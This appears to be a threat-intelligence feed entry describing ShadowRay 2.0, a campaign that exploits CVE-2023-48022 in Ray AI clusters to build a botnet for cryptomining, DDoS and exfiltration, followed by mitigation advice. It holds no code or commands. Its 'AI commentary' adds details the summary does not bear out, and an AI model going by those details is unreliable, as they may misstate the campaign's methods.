ShadowRay 2.0: Active Global Campaign Hijacks Ray AI Infrastructure Into Self-Propagating Botnet

SUMMARY :

A global hacking campaign dubbed ShadowRay 2.0 has been discovered, exploiting a vulnerability in the Ray AI framework to seize control of computing clusters and create a self-replicating botnet. The attackers use GitLab and GitHub for payload delivery, leveraging AI-generated code to adapt their methods. The campaign has evolved from simple cryptojacking to a sophisticated multi-purpose botnet capable of DDoS attacks and data exfiltration. The operation targets exposed Ray clusters worldwide, utilizing DevOps-style infrastructure for real-time malware updates. This campaign highlights the growing attack surface in AI workloads and the risks associated with disputed vulnerabilities.

OPENCTI LABELS :

self-propagation,devops,cve-2023-48022,ddos,xmrig,data exfiltration,botnet,cryptojacking,ai infrastructure,sockstress,ray framework


AI COMMENTARY :

1. Introduction to ShadowRay 2.0: The security community has recently uncovered ShadowRay 2.0, a global hacking campaign targeting exposed Ray AI clusters worldwide. By exploiting a critical vulnerability in the Ray framework identified as CVE-2023-48022, attackers have seized control of computing resources to establish a self-replicating botnet that leverages AI workloads for malicious gain.

2. Exploitation of the Ray Framework Vulnerability: Researchers traced the intrusion vector to an unpatched flaw in the Ray framework that enables remote code execution. ShadowRay operators deliver payloads via compromised GitLab and GitHub repositories, where they host AI-generated code modules. These modules adapt dynamically to evade detection and maintain persistence across cluster nodes.

3. Infrastructure and DevOps-Style Delivery Methods: The campaign utilizes DevOps methodologies to orchestrate real-time updates and continuous deployment of malware. Leveraging containerized environments and CI/CD pipelines familiar to AI development teams, attackers inject malicious scripts that download and execute the xmrig cryptominer or modify sockstress tools to test network resilience for future DDoS campaigns.

4. Evolution from Cryptojacking to a Multi-Purpose Botnet: Initially focused on cryptojacking, ShadowRay 2.0 has evolved into a versatile botnet capable of launching volumetric DDoS attacks and performing covert data exfiltration. AI-enhanced code generation allows operators to swap modules on the fly, transitioning seamlessly between generating cryptocurrency revenue and harvesting sensitive information from targeted clusters.

5. Self-Propagation Mechanics and Attack Vectors: Self-propagation is achieved through lateral movement within compromised clusters. Once a foothold is established, the botnet scans for additional Ray nodes, exploiting similar misconfigurations or unpatched instances. This automated spread strikes a balance between stealth and speed, ensuring the botnet remains concealed until critical mass is reached.

6. Implications for AI Infrastructure Security and Mitigation Strategies: ShadowRay 2.0 underscores the expanding attack surface in AI infrastructure and the urgency of patch management. Defenders should prioritize remediation of CVE-2023-48022, enforce strict access controls on repository integrations, implement network segmentation to limit lateral movement, and deploy threat-hunting capabilities to detect anomalous DevOps activity. Vigilance and proactive security measures are essential to protect next-generation AI workloads from sophisticated botnet campaigns.


OPEN NETMANAGEIT OPENCTI REPORT LINK!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


ShadowRay 2.0: Active Global Campaign Hijacks Ray AI Infrastructure Into Self-Propagating Botnet